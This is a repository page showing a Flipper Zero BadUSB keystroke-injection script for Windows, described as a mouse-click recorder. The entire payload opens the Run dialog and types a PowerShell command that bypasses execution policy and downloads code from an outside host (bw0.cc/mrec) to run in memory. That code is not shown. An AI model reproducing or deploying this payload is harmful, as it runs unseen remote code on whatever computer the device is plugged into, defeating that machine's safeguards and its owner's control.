Files
BadUSB-Files-For-FlipperZero/Mouse-Clicks-Recorder/Mouse-Clicks-Recorder.txt
T
2025-06-20 21:11:38 +00:00

17 lines
445 B
Plaintext

REM Title: Mouse Clicks Recorder
REM Author: @beigeworm
REM Description: Record your mouse clicks and positions along with interval time between clicks.. (for loading screens etc.)
REM Description: Play them back later and automate clicky tasks!
REM Target: Windows 10
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell
DELAY 1000
GUI r
DELAY 750
STRING powershell -Ep Bypass -C iex (irm bw0.cc/mrec)
ENTER